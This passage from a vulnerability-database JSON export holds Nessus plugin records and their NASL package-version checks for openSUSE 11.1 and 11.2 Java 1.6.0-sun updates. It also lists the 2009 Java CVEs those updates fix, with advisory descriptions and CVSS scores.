"CVE-2009-3868"], "modified": "2009-11-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-sun", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-src", 
"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc"], "id": "SUSE_11_1_JAVA-1_6_0-SUN-091113.NASL", "href": "https://www.tenable.com/plugins/nessus/42853", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-sun-1541.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42853);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3865\", \"CVE-2009-3866\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-1541)\");\n script_summary(english:\"Check for the java-1_6_0-sun-1541 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\nCVE-2009-3866:The Java Web Start Installer in Sun Java SE in JDK and\nJRE 6 before Update 17 does not properly use security model\npermissions when removing installer extensions, which allows remote\nattackers to execute arbitrary code by modifying a certain JNLP file\nto have a URL field that poi nts to an unintended trusted application,\naka Bug Id 6872824.\n\nCVE-2009-3867: Stack-based buffer overflow in the\nHsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x\nbefore 1.3.1_27, and SDK and JRE 
1.4.x before 1.4.2_24 allows remote\nattackers to execute arbitrary code via a long file: URL in an\nargument, aka Bug Id 6854303.\n\nCVE-2009-3869: Stack-based buffer overflow in the setDiffICM function\nin the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE)\nin Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6\nbefore Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n1.4.x before 1.4.2_ 24 allows remote attackers to execute arbitrary\ncode via a crafted argument, aka Bug Id 6872357.\n\nCVE-2009-3871: Heap-based buffer overflow in the setBytePixels\nfunction in the Abstract Window Toolkit (AWT) in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4. 2_24 allows remote attackers to execute\narbitrary code via crafted arguments, aka Bug Id 6872358.\n\nCVE-2009-3874: Integer overflow in the JPEGImageReader implementation\nin the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before\nUpdate 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to execute arbitrary code via\nlarge subsample dimensi ons in a JPEG file that triggers a heap-based\nbuffer overflow, aka Bug Id 6874643.\n\nCVE-2009-3875: The MessageDigest.isEqual function in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof\nHMAC-based digital si gnatures, and possibly bypass authentication,\nvia unspecified vectors related to 'timing attack vulnerabilities,'\naka Bug Id 6863503.\n\nCVE-2009-3876: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a 
denial of service (memory consumption) via\ncrafted DER encoded data, which is not properly decoded by the ASN.1\nDER input stream parser, aka Bug Id 6864911.\n\nCVE-2009-3877: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted HTTP header s, which are not properly parsed by the ASN.1 DER\ninput stream parser, aka Bug Id 6864911.\n\nCVE-2009-3864: The Java Update functionality in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22\nand JDK and JRE 6 before Update 17, when a non-English version of\nWindows is used, does not retrieve available new JRE versions, which\nallows remote attackers to lev erage vulnerabilities in older releases\nof this software, aka Bug Id 6869694.\n\nCVE-2009-3865: The launch method in the Deployment Toolkit plugin in\nJava Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before\nUpdate 17 allows remote attackers to execute arbitrary commands via a\ncrafted web page, aka Bug Id 6869752.\n\nCVE-2009-3868: Sun Java SE in JDK and JRE 5.0 before Update 22, JDK\nand JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\nand JRE 1.4.x be fore 1.4.2_24 does not properly parse color profiles,\nwhich allows remote attackers to gain privileges via a crafted image\nfile, aka Bug Id 6862970.\n\nCVE-2009-3872: Unspecified vulnerability in the JPEG JFIF Decoder in\nSun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before\nUpdate 17, SDK a nd JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to gain privileges via a\ncrafted image file, aka Bug Id 6862969.\n\nCVE-2009-3873: The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, and SDK and JRE\n1.4.x before 1.4.2 _24 allows 
remote attackers to gain privileges via\na crafted image file, related to a 'quanization problem,' aka Bug Id\n6862968.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552586\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-alsa-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-devel-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-plugin-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-src-1.6.0.u17-1.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:45", "description": "The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\nCVE-2009-3866: The Java Web Start Installer in Sun Java SE in JDK and\nJRE 6 before Update 17 does not properly use security model\npermissions when removing installer extensions, which allows remote\nattackers to execute arbitrary code by modifying a certain JNLP file\nto have a URL field that points to an unintended trusted application,\naka Bug Id 6872824.\n\nCVE-2009-3867: Stack-based buffer overflow in the\nHsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x\nbefore 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote\nattackers to execute arbitrary code via a long file: URL in an\nargument, aka Bug Id 6854303.\n\nCVE-2009-3869: Stack-based buffer overflow in the setDiffICM function\nin the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE)\nin Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6\nbefore Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary\ncode via a crafted argument, aka Bug Id 6872357.\n\nCVE-2009-3871: Heap-based buffer overflow in the setBytePixels\nfunction in the Abstract Window Toolkit (AWT) in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4. 
2_24 allows remote attackers to execute\narbitrary code via crafted arguments, aka Bug Id 6872358.\n\nCVE-2009-3874: Integer overflow in the JPEGImageReader implementation\nin the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before\nUpdate 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to execute arbitrary code via\nlarge subsample dimensions in a JPEG file that triggers a heap-based\nbuffer overflow, aka Bug Id 6874643.\n\nCVE-2009-3875: The MessageDigest.isEqual function in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof\nHMAC-based digital signatures, and possibly bypass authentication,\nvia unspecified vectors related to 'timing attack vulnerabilities,'\naka Bug Id 6863503.\n\nCVE-2009-3876: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted DER encoded data, which is not properly decoded by the ASN.1\nDER input stream parser, aka Bug Id 6864911.\n\nCVE-2009-3877: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted HTTP headers, which are not properly parsed by the ASN.1 DER\ninput stream parser, aka Bug Id 6864911.\n\nCVE-2009-3864: The Java Update functionality in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22\nand JDK and JRE 6 before Update 17, when a non-English version of\nWindows is used, does not retrieve available new JRE versions, which\nallows 
remote attackers to lev erage vulnerabilities in older releases\nof this software, aka Bug Id 6869694.\n\nCVE-2009-3865: The launch method in the Deployment Toolkit plugin in\nJava Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before\nUpdate 17 allows remote attackers to execute arbitrary commands via a\ncrafted web page, aka Bug Id 6869752.\n\nCVE-2009-3868: Sun Java SE in JDK and JRE 5.0 before Update 22, JDK\nand JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\nand JRE 1.4.x be fore 1.4.2_24 does not properly parse color profiles,\nwhich allows remote attackers to gain privileges via a crafted image\nfile, aka Bug Id 6862970.\n\nCVE-2009-3872: Unspecified vulnerability in the JPEG JFIF Decoder in\nSun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before\nUpdate 17, SDK a nd JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to gain privileges via a\ncrafted image file, aka Bug Id 6862969.\n\nCVE-2009-3873: The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, and SDK and JRE\n1.4.x before 1.4.2 _24 allows remote attackers to gain privileges via\na crafted image file, related to a 'quanization problem,' aka Bug Id\n6862968.", "edition": 25, "published": "2009-11-19T00:00:00", "title": "openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-1541)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-sun", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-src", "cpe:/o:novell:opensuse:11.2", 
"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc"], "id": "SUSE_11_2_JAVA-1_6_0-SUN-091113.NASL", "href": "https://www.tenable.com/plugins/nessus/42855", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-sun-1541.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42855);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3865\", \"CVE-2009-3866\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-1541)\");\n script_summary(english:\"Check for the java-1_6_0-sun-1541 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\nCVE-2009-3866:The Java Web Start Installer in Sun Java SE in JDK and\nJRE 6 before Update 17 does not properly use security model\npermissions when removing installer extensions, which allows remote\nattackers to execute arbitrary code by modifying a certain JNLP file\nto have a URL field that poi nts to an unintended trusted application,\naka Bug Id 6872824.\n\nCVE-2009-3867: Stack-based buffer overflow in the\nHsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, SDK and 
JRE 1.3.x\nbefore 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote\nattackers to execute arbitrary code via a long file: URL in an\nargument, aka Bug Id 6854303.\n\nCVE-2009-3869: Stack-based buffer overflow in the setDiffICM function\nin the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE)\nin Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6\nbefore Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n1.4.x before 1.4.2_ 24 allows remote attackers to execute arbitrary\ncode via a crafted argument, aka Bug Id 6872357.\n\nCVE-2009-3871: Heap-based buffer overflow in the setBytePixels\nfunction in the Abstract Window Toolkit (AWT) in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4. 2_24 allows remote attackers to execute\narbitrary code via crafted arguments, aka Bug Id 6872358.\n\nCVE-2009-3874: Integer overflow in the JPEGImageReader implementation\nin the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before\nUpdate 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to execute arbitrary code via\nlarge subsample dimensi ons in a JPEG file that triggers a heap-based\nbuffer overflow, aka Bug Id 6874643.\n\nCVE-2009-3875: The MessageDigest.isEqual function in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof\nHMAC-based digital si gnatures, and possibly bypass authentication,\nvia unspecified vectors related to 'timing attack vulnerabilities,'\naka Bug Id 6863503.\n\nCVE-2009-3876: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 
1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted DER encoded data, which is not properly decoded by the ASN.1\nDER input stream parser, aka Bug Id 6864911.\n\nCVE-2009-3877: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1 _27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted HTTP header s, which are not properly parsed by the ASN.1 DER\ninput stream parser, aka Bug Id 6864911.\n\nCVE-2009-3864: The Java Update functionality in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22\nand JDK and JRE 6 before Update 17, when a non-English version of\nWindows is used, does not retrieve available new JRE versions, which\nallows remote attackers to lev erage vulnerabilities in older releases\nof this software, aka Bug Id 6869694.\n\nCVE-2009-3865: The launch method in the Deployment Toolkit plugin in\nJava Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before\nUpdate 17 allows remote attackers to execute arbitrary commands via a\ncrafted web page, aka Bug Id 6869752.\n\nCVE-2009-3868: Sun Java SE in JDK and JRE 5.0 before Update 22, JDK\nand JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\nand JRE 1.4.x be fore 1.4.2_24 does not properly parse color profiles,\nwhich allows remote attackers to gain privileges via a crafted image\nfile, aka Bug Id 6862970.\n\nCVE-2009-3872: Unspecified vulnerability in the JPEG JFIF Decoder in\nSun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before\nUpdate 17, SDK a nd JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to gain privileges via a\ncrafted image file, aka Bug Id 6862969.\n\nCVE-2009-3873: The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, and SDK 
and JRE\n1.4.x before 1.4.2 _24 allows remote attackers to gain privileges via\na crafted image file, related to a 'quanization problem,' aka Bug Id\n6862968.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552586\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-alsa-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-demo-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-devel-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-plugin-1.6.0.u17-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"java-1_6_0-sun-src-1.6.0.u17-1.1.1\") ) flag++;\n\nif 
(flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:11:45", "description": "The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\n - The Java Web Start Installer in Sun Java SE in JDK and\n JRE 6 before Update 17 does not properly use security\n model permissions when removing installer extensions,\n which allows remote attackers to execute arbitrary code\n by modifying a certain JNLP file to have a URL field\n that poi nts to an unintended trusted application, aka\n Bug Id 6872824. (CVE-2009-3866)\n\n - Stack-based buffer overflow in the\n HsbParser.getSoundBank function in Sun Java SE in JDK\n and JRE 5.0 before Update 22, JDK and JRE 6 before\n Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\n and JRE 1.4.x before 1.4.2_24 allows remote attackers to\n execute arbitrary code via a long file: URL in an\n argument, aka Bug Id 6854303. (CVE-2009-3867)\n\n - Stack-based buffer overflow in the setDiffICM function\n in the Abstract Window Toolkit (AWT) in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4.2_ 24 allows remote attackers to execute\n arbitrary code via a crafted argument, aka Bug Id\n 6872357. (CVE-2009-3869)\n\n - Heap-based buffer overflow in the setBytePixels function\n in the Abstract Window Toolkit (AWT) in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4. 
2_24 allows remote attackers to execute\n arbitrary code via crafted arguments, aka Bug Id\n 6872358. (CVE-2009-3871)\n\n - Integer overflow in the JPEGImageReader implementation\n in the ImageI/O component in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n and SDK and JRE 1.4.x before 1.4.2_24 allows remote\n attackers to execute arbitrary code via large subsample\n dimensions in a JPEG file that triggers a heap-based\n buffer overflow, aka Bug Id 6874643. (CVE-2009-3874)\n\n - The MessageDigest.isEqual function in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4.2_24 allows remote attackers to spoof\n HMAC-based digital signatures, and possibly bypass\n authentication, via unspecified vectors related to\n 'timing attack vulnerabilities,' aka Bug Id 6863503.\n (CVE-2009-3875)\n\n - Unspecified vulnerability in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n 1.4.x before 1.4.2_24 allows remote attackers to cause a\n denial of service (memory consumption) via 